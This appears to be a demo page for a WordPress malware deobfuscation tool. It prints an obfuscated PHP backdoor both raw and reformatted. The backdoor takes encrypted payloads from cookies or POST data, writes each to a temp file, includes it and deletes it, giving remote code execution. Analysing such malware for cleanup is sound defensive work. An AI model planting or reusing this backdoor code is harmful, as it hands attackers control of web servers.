Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function b1($z2){$s3 = "L1pbsxf5-?r3/hF6e*#7n;Eio0mav'I)k8gHtc.u _<(d4@yl" ."9" ;$v5='';foreach($z2 as $o4){$v5.=$s3[$o4];}return $v5;}$h6 = Array();$h6[] = b1(Array(37,7,6,25,44,37,11,49,8,19,1,16,7,8,45,7,15,27,8,27,37,16,25,8,7,33,16,37,44,49,16,27,15,15,15,19));$h6[] = b1(Array(9,2,1...



Obfuscated php code

<?php
function b1($z2){$s3 = "L1pbsxf5-?r3/hF6e*#7n;Eio0mav'I)k8gHtc.u _<(d4@yl" ."9" ;$v5='';foreach($z2 as $o4){$v5.=$s3[$o4];}return $v5;}$h6 = Array();$h6[] = b1(Array(37,7,6,25,44,37,11,49,8,19,1,16,7,8,45,7,15,27,8,27,37,16,25,8,7,33,16,37,44,49,16,27,15,15,15,19));$h6[] = b1(Array(9,2,13,2,40,46,39,20,48,23,20,32,43,41,41,14,30,0,22,41,41,31,21,40));$h6[] = b1(Array(38,26,24,44,39,48,16));$h6[] = b1(Array(35,17));$h6[] = b1(Array(38,12));$h6[] = b1(Array(18));$h6[] = b1(Array(42));$h6[] = b1(Array(6,23,48,16,41,2,39,36,41,37,24,20,36,16,20,36,4));$h6[] = b1(Array(27,10,10,27,47,41,26,16,10,34,16));$h6[] = b1(Array(4,36,10,41,10,16,2,16,27,36));$h6[] = b1(Array(16,5,2,48,24,44,16));$h6[] = b1(Array(4,39,3,4,36,10));$h6[] = b1(Array(39,20,48,23,20,32));$h6[] = b1(Array(4,36,10,48,16,20));$h6[] = b1(Array(2,27,37,32));$h6[] = b1(Array(26,44,7));foreach ($h6[8]($_COOKIE, $_POST) as $c14 => $c11){function d8($h6, $c14, $j10){return $h6[11]($h6[9]($c14 . $h6[0], ($j10 / $h6[13]($c14)) + 1), 0, $j10);}function o7($h6, $t12){return @$h6[14]($h6[3], $t12);}function j9($h6, $t12){if (isset($t12[2])) {$y13 = $h6[4] . $h6[15]($h6[0]) . $h6[2];@$h6[7]($y13, $h6[6] . $h6[1] . $t12[1]($t12[2]));@include($y13);@$h6[12]($y13);exit();}}$c11 = o7($h6, $c11);j9($h6, $h6[10]($h6[5], $c11 ^ d8($h6, $c14, $h6[13]($c11))));}

Decoded(de-Obfuscated) php code

<?php

function b1($z2)
{
    $s3 = "L1pbsxf5-?r3/hF6e*#7n;Eio0mav'I)k8gHtc.u _<(d4@yl9";
    $v5 = '';
    foreach ($z2 as $o4) {
        $v5 .= $s3[$o4];
    }
    return $v5;
}
$h6 = array();
$h6[] = b1(array(37, 7, 6, 25, 44, 37, 11, 49, 8, 19, 1, 16, 7, 8, 45, 7, 15, 27, 8, 27, 37, 16, 25, 8, 7, 33, 16, 37, 44, 49, 16, 27, 15, 15, 15, 19));
$h6[] = b1(array(9, 2, 13, 2, 40, 46, 39, 20, 48, 23, 20, 32, 43, 41, 41, 14, 30, 0, 22, 41, 41, 31, 21, 40));
$h6[] = b1(array(38, 26, 24, 44, 39, 48, 16));
$h6[] = b1(array(35, 17));
$h6[] = b1(array(38, 12));
$h6[] = b1(array(18));
$h6[] = b1(array(42));
$h6[] = b1(array(6, 23, 48, 16, 41, 2, 39, 36, 41, 37, 24, 20, 36, 16, 20, 36, 4));
$h6[] = b1(array(27, 10, 10, 27, 47, 41, 26, 16, 10, 34, 16));
$h6[] = b1(array(4, 36, 10, 41, 10, 16, 2, 16, 27, 36));
$h6[] = b1(array(16, 5, 2, 48, 24, 44, 16));
$h6[] = b1(array(4, 39, 3, 4, 36, 10));
$h6[] = b1(array(39, 20, 48, 23, 20, 32));
$h6[] = b1(array(4, 36, 10, 48, 16, 20));
$h6[] = b1(array(2, 27, 37, 32));
$h6[] = b1(array(26, 44, 7));
foreach ($h6[8]($_COOKIE, $_POST) as $c14 => $c11) {
    function d8($h6, $c14, $j10)
    {
        return $h6[11]($h6[9]($c14 . $h6[0], $j10 / $h6[13]($c14) + 1), 0, $j10);
    }
    function o7($h6, $t12)
    {
        return @$h6[14]($h6[3], $t12);
    }
    function j9($h6, $t12)
    {
        if (isset($t12[2])) {
            $y13 = $h6[4] . $h6[15]($h6[0]) . $h6[2];
            @$h6[7]($y13, $h6[6] . $h6[1] . $t12[1]($t12[2]));
            @(include $y13);
            @$h6[12]($y13);
            exit;
        }
    }
    $c11 = o7($h6, $c11);
    j9($h6, $h6[10]($h6[5], $c11 ^ d8($h6, $c14, $h6[13]($c11))));
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.